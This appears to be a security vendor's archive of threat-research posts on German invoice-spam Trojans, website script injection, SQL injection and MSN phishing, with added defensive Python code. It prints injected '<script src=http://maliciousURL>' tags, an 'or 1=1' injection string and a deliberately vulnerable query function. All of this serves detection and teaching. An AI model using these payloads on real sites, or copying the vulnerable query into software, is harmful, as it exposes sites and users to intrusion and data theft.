    Author Archive - Alice Decker (Senior Threat Researcher)

    Some people from outside Germany, where I am from, would say that Germans like correctness in business, love traditions and fear online transactions (or at least anything that cannot be controlled). Well, what can I say... maybe they are right; some facts speak for it.

    For the last two years it has become an unwanted tradition for the German computing public to receive threatening spam carrying the file RECHNUNG.EXE ("Rechnung" is German for invoice). These "bills" typically referred to online orders of web cams, online shopping, furniture, court invoices, payment of GEZ (TV licence) fees, software licences and more. We first saw emails of this kind in April 2006, when the spam posed as an online invoice service set up by the German Telekom.

    A closer look at the text in the message body suggests that the social engineering behind this attack plays on the fear that comes with online payments (more precisely, the fear of errors that lead to uncontrollable and unexpected charges). During 2006 and 2007 these attachments were detected as TROJ_YABE and TROJ_BZUB (ipv6monl.dll). In the second half of 2007 the waves of TROJ_YABE seemed to flatten out or even stop. But now, after more than two years, the YABE Trojan appears to be making a comeback.

    In the last four weeks German users have been receiving "payment reminders" in their inboxes. The "proof" of the payment came either as an attached file or as a link, named Rechnung.exe or Rechnung.pdf.exe or a variation of these. The spam run is still ongoing as of this writing. The payment notification comes from a random sender address and claims to originate from PayPal (Europe). This time the "invoice" is an archive file, Rechnung.rar, which contains the file Rechnung.exe. A sample email is shown below.

    Upon execution the Trojan (TROJ_BUZUB.IB) connects to a remote system and downloads a second file, named bot.exe or back.exe or a variation of these; the downloaded file is 49,152 bytes in size and is detected as TROJ_BUZUS.BG. It also drops a new version of the WSNPOEM malware, NTOS.EXE, detected as TROJ_WSNPOEM.AA. This Trojan has rootkit-like capabilities: it hides itself by installing a WH_MSGFILTER Windows hook (a global hook of this kind is set with SetWindowsHookEx and gets its DLL loaded into other GUI processes). It works with data files stored in %System32%\wsnpoem, namely audio.dll and video.dll.

    It also attempts to inject code into the svchost.exe and winlogon.exe processes and registers the infected system with the remote server using the computer name and an ID. The DLL used for the injection (at least in the version from 1 June) is cryptonet.dll, 28,672 bytes in size and detected as a TROJ_BUZUB variant. A WHOIS lookup shows that the IP address of the download server is registered to a private individual; this is still being checked as of this writing.

    Posted in Malware, Spam | Comments Off on New Old Bills: The Rechnung Revivals

    Some days ago our researchers from TrendLabs discovered an attack on Web sites from the European region. Since the number of compromised sites was low, and because they were immediately cleaned, we figured it might be just a proof of concept.

    F-Secure researchers also announced a similar attack where more than 500,000 sites were affected.

    The infection code was a <script> tag pointing to a malicious URL. The new discovery here is that these tags were inserted between the usual text tags, for example inside <title></title>:

    <title>My Website <script src=http://maliciousURL></script></title>

    and into <meta>, <a href>, <div class="myclass"> and similar tags, for example inside an unquoted attribute value:

    <a href=http://goodURL <script src=http://maliciousURL></script>>

    An infected Web site would display the injected tag in the browser window title.

    Neither <title> nor <meta> is supposed to contain a <script> element, but some browsers' error recovery for malformed HTML will still execute a script tag wherever the parser encounters it. Visitors of the affected Web sites are thus exposed to whatever the remote script loads onto their systems.
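    A check a site owner can run for the injection signature just described, as an added example that is not part of the original post: it scans a page for a <script> tag inside the <title> text or inside the attribute region of another tag, which is where the post says the tags were planted. The sample page below is constructed here using the post's own http://goodURL and http://maliciousURL placeholders; it is not a capture of an infected site, and the regular-expression approach is an assumption chosen so the scan runs without a browser.

```python
import re

# Opening <script ...> tag, with or without its closing '>', so it is found both in
# the title text and inside the attribute region of another tag.
SCRIPT_OPEN = re.compile(r"<script\b[^>]*", re.IGNORECASE)
# <title> ... </title> block: the post's first injection point.
TITLE_BLOCK = re.compile(r"<title\b[^>]*>(.*?)</title>", re.IGNORECASE | re.DOTALL)
# Any start tag other than <script>. Its attribute region ([^>]*) cannot legitimately
# contain a second '<', so a "<script" in there is the <a href=... <script ...> pattern.
START_TAG = re.compile(r"<(?!/)(?!script\b)([a-zA-Z][\w:-]*)([^>]*)>", re.IGNORECASE)


def scan_html(html):
    """Return a list of (tag_name, injected_snippet) for every <script> found inside
    the <title> text or inside another tag's attribute region."""
    findings = []
    for title in TITLE_BLOCK.finditer(html):
        for hit in SCRIPT_OPEN.finditer(title.group(1)):
            findings.append(("title", hit.group(0).strip()))
    for tag in START_TAG.finditer(html):
        name, attrs = tag.group(1).lower(), tag.group(2)
        hit = SCRIPT_OPEN.search(attrs)
        if hit:
            findings.append((name, hit.group(0).strip()))
    return findings


# Constructed sample page (not a capture from the original post) with the three
# injection placements the post describes: in <title>, in <meta> and in <a href=...>.
# http://maliciousURL and http://goodURL are the post's own placeholders.
SAMPLE_HTML = """<html><head>
<title>My Website <script src=http://maliciousURL></script></title>
<meta name="description" content="shop" <script src=http://maliciousURL></script>>
</head><body>
<a href=http://goodURL <script src=http://maliciousURL></script>>Home</a>
<div class="myclass">text</div>
<script src="/static/app.js"></script>
</body></html>"""

# A clean page with a legitimate script in its normal place, which must not be flagged.
CLEAN_HTML = """<html><head><title>My Website</title></head>
<body><a href="http://goodURL">Home</a><script src="/static/app.js"></script></body></html>"""

if __name__ == "__main__":
    for where, snippet in scan_html(SAMPLE_HTML):
        print("%-6s %s" % (where, snippet))
```

    The scanner only reports the placements the post describes, so a legitimate script in the page body is left alone; a script whose src points at an unknown host elsewhere in the page would need a separate allow-list check.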

    The mass infection of Web sites was supposedly carried out through automated SQL injection. This is not the first instance of this type of attack and, unfortunately, it will not be the last.

    What is notable about SQL injection is that it can be triggered at any time, regardless of the patch level of the SQL server behind the site. The success of the attack depends on the Web application that uses the SQL server. A Web site with no field content control is easy to fool into sending the server an attacker-supplied SQL command. To simplify, a user-id field filled with "blah or 1=1" turns the application's query into:

    "SELECT * FROM bank_data WHERE Userid=blah or 1=1"

    and the condition is true for every row. The moral of this story is that cyber criminals will have an easy game as long as Web sites are built by construction-kit users or by inexperienced developers who do not consider field content checking.
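    The query above, worked through in an added example that is not from the original post. An in-memory SQLite table stands in for the site's database (the table name bank_data is the post's; the columns and rows are constructed here, and SQLite is an assumption chosen so the example runs offline). lookup_vulnerable pastes the form field into the SQL text exactly as the post describes, so the value "0 or 1=1" (the post's "blah or 1=1" with a concrete number in place of blah) returns every row; lookup_parameterised shows that a placeholder alone already defeats this, and lookup_checked puts the field content check the post asks for in front of it.

```python
import sqlite3

# Constructed sample data, not from the original post: a tiny bank_data table keyed by
# a numeric user id, matching the shape of the post's SELECT example.
SAMPLE_ROWS = [
    (1, "alice", "DE00 1111 2222 3333 4444 55"),
    (2, "bob", "DE00 6666 7777 8888 9999 00"),
]


def make_db():
    # In-memory SQLite stands in for whatever SQL server sits behind the site; the
    # injection works the same way because the flaw is in the application, not the server.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE bank_data (userid INTEGER, name TEXT, iban TEXT)")
    conn.executemany("INSERT INTO bank_data VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, userid_field):
    """No field content control: the form value is pasted straight into the SQL text."""
    sql = "SELECT userid, name, iban FROM bank_data WHERE userid=" + userid_field
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, userid_value):
    """Placeholder query: the value travels separately from the SQL text, so
    'or 1=1' is compared as a literal string and never becomes SQL."""
    return conn.execute(
        "SELECT userid, name, iban FROM bank_data WHERE userid=?", (userid_value,)
    ).fetchall()


def lookup_checked(conn, userid_field):
    """Field content check in front of the parameterised query: a user id must be a
    plain integer, so anything else is rejected before it reaches the database."""
    if not userid_field.isdigit():
        raise ValueError("userid must be a positive integer: %r" % userid_field)
    return lookup_parameterised(conn, int(userid_field))


def demo():
    """Run the honest and the hostile field value through all three lookups."""
    conn = make_db()
    honest = "2"
    hostile = "0 or 1=1"  # the post's "blah or 1=1", with a concrete value for blah
    out = {
        "vulnerable_honest": lookup_vulnerable(conn, honest),
        "vulnerable_hostile": lookup_vulnerable(conn, hostile),   # every row leaks
        "parameterised_hostile": lookup_parameterised(conn, hostile),  # no match
        "checked_honest": lookup_checked(conn, honest),
    }
    try:
        lookup_checked(conn, hostile)
        out["checked_hostile"] = "accepted"
    except ValueError:
        out["checked_hostile"] = "rejected"
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-22s %r" % (key, value))
```

    Parameterisation is the fix that holds on its own; the integer check in front of it is the "field content checking" the post asks for and gives the application a place to log and reject the attempt instead of silently returning nothing.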

    Trend Micro users are already protected, first through a generic detection of the script — as HTML_IFRAME.YC — and certainly through Web Threat Protection.

    Posted in Malware | Comments Off on Oops, they did it again…

    Do you know the story where a human and a monkey lived in two rooms separated by a single door?

    The first part of the story says that after a while in that room, the human started to get curious and decided to find out what was happening behind the door. As the human peeked through the keyhole, what he saw was another eye, which apparently was the monkey’s.

    Cyber criminals can get the maximum yield from the simplest of methods by exploiting exactly this human curiosity. How?

    The first step is to send a spam email message. This message is supposedly sent through well-known botnet infrastructure.

    The message above is in German, but it could be sent in any language. In English it reads: "With our completely free service you can find out who has blocked or deleted you on MSN."

    The link opens a Web site that invites the visitor to use the free service to check the status of his MSN account.

    All the user has to do here is "peek through the keyhole": type in his MSN account name and the correct password to find out whether his account is "indeed blacklisted". Of course no answer ever comes back, but what happens then?

    If the data entered in these fields is valid, it is sent to a mailbox controlled by the criminals, and the user has unwittingly supplied the credentials for whatever they do next.

    This gives cyber criminals a free choice of how to use the unlawfully acquired data in their illicit activities. The hijacked MSN account can be used to send spam and to distribute malware both through email and through the instant-messaging application MSN Messenger. Apart from this, the unauthorized user has access to the mailbox and can gather personal data about the victim.

    Posted in Malware, Spam | Comments Off on Curiosity is the Nourishment of Social Engineering

    In the last weeks, German email recipients have been forced to sharpen their defences against social engineering.

    In the first days of 2007 the German-speaking area was flooded with emails posing as bills from the provider 1&1. Later on, the requests for payment were tied to other typical German payments such as GEZ (the government TV licence fee) or simply online orders.

    Anybody who cares about email security might think that recipients are slowly getting used to such emails (a payment request with the invoice attached as Rechnung.pdf.exe or simply Rechnung.exe). But the Trojan spammers are persevering and refining their social engineering to trick users into running a program with spying capabilities, and thereby revealing sensitive information such as their bank account data to criminals. The first step into the system is always taken with social engineering.

    German Ebay marketplace customers may be slightly confused today (Monday the 29th). This new email is not a payment request. It says that a direct debit could not be completed: the usual settlement failed and the user is asked to double-check his account data. The instructions for doing so are correct and point to the real Ebay Web site.

    The email body itself is not dangerous at all. It includes some valid Ebay URLs and refers to the attached list of transactions for which the user supposedly has to pay 426.96 Euro; that attachment is the malicious code.

    The second new element of this email is the behaviour of the attached file (E260883905016 Rechnung.pdf.exe): when run, it displays a real-looking document.

    On execution the file drops another executable into %UserTemp%. This file attempts to connect to the Internet and downloads further components. It is nothing new that files are dropped and run in the background so that the user does not notice them (vapo3.exe, win.exe, ipv6monl.dll and others).

    To hide the malicious activity running in the background, the program shows a fake PDF file with accounting data (which must look confusing even to accounting professionals).

    This time the user is shown a PDF file with a list of transactions.

    Trend Micro will soon detect the file as TROJ_YABE.AY. We will continuously update our Virus Encyclopaedia whenever we find new details.

    Update (Jessie Paz, Tue, 30 Jan 2007 01:51:21 AM)

    Updates courtesy of Alice.

    After deeper analysis, TrendLabs decided to change the malware name to TROJ_YABE.BB. The detection is included in CPR (controlled pattern release) 4.224.03 and above.

    NOTE: Today, the 29th, we faced four waves of TROJ_YABE. The attached files and their detections are:

    • TROJ_YABE.BB in file “E260883905016-Rechnung.pdf.exe”
    • TROJ_YABE.BA in file “rechnung.exe”
    • TROJ_YABE.AX in file “RG_129427621.pdf.exe”
    • TROJ_YABE.BF in file “rechnung.exe”
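    A mail-gateway filter for the attachment names listed above and in the Rechnung posts on this page, as an added example that is not from the original posts: it flags executable attachments, double extensions such as Rechnung.pdf.exe that disguise an executable as a document, and executables packed inside an archive. The attachments are constructed here with dummy bytes rather than the real malware, and a zip archive is used in place of the Rechnung.rar from the first post because the standard library can read zip without an external unrar tool; the extension lists are assumptions a practitioner would tune.

```python
import io
import zipfile

# Extensions Windows runs on double-click: the real payload type behind every lure here.
EXECUTABLE_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd"}
# Document types the lures pretend to be ("Rechnung.pdf.exe").
DOCUMENT_EXTS = {"pdf", "doc", "xls", "rtf", "txt"}


def classify_filename(name):
    """Return a reason if the name looks like an executable invoice lure, else None."""
    parts = name.lower().rsplit(".", 2)  # at most [stem, inner_ext, outer_ext]
    if len(parts) < 2:
        return None
    outer = parts[-1]
    if outer not in EXECUTABLE_EXTS:
        return None
    if len(parts) == 3 and parts[1] in DOCUMENT_EXTS:
        return "executable disguised as .%s (double extension)" % parts[1]
    return "executable attachment (.%s)" % outer


def classify_archive(name, data):
    """Open a zip attachment and classify each member name inside it.
    (Rechnung.rar from the first post would need an external unrar tool.)"""
    if not name.lower().endswith(".zip"):
        return []
    reasons = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for member in zf.namelist():
            reason = classify_filename(member)
            if reason:
                reasons.append("%s inside %s: %s" % (member, name, reason))
    return reasons


def scan_attachments(attachments):
    """attachments: list of (filename, bytes). Returns the list of reasons to quarantine."""
    reasons = []
    for name, data in attachments:
        reason = classify_filename(name)
        if reason:
            reasons.append("%s: %s" % (name, reason))
        reasons.extend(classify_archive(name, data))
    return reasons


def _zip_with(member_name, payload):
    # Build a small in-memory zip for the constructed sample.
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


# Constructed sample attachments using the file names from the posts; the contents are
# dummy bytes, not the real malware. The last entry is a genuine document name that
# must pass.
SAMPLE_ATTACHMENTS = [
    ("E260883905016-Rechnung.pdf.exe", b"MZ dummy"),
    ("rechnung.exe", b"MZ dummy"),
    ("RG_129427621.pdf.exe", b"MZ dummy"),
    ("Rechnung.zip", _zip_with("Rechnung.exe", b"MZ dummy")),
    ("Rechnung.pdf", b"%PDF-1.4 dummy"),
]

if __name__ == "__main__":
    for line in scan_attachments(SAMPLE_ATTACHMENTS):
        print(line)
```

    The name-based check is cheap and catches every lure named on this page, but it is only a first layer: a real gateway would also look at the file's magic bytes, since a lure can be renamed to a document extension and still be run by a user who opens it from an archive.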


    Posted in Bad Sites | Comments Off on Yet Another “Bill” from Ebay


    © Copyright 2013 Trend Micro Inc. All rights reserved. Legal Notice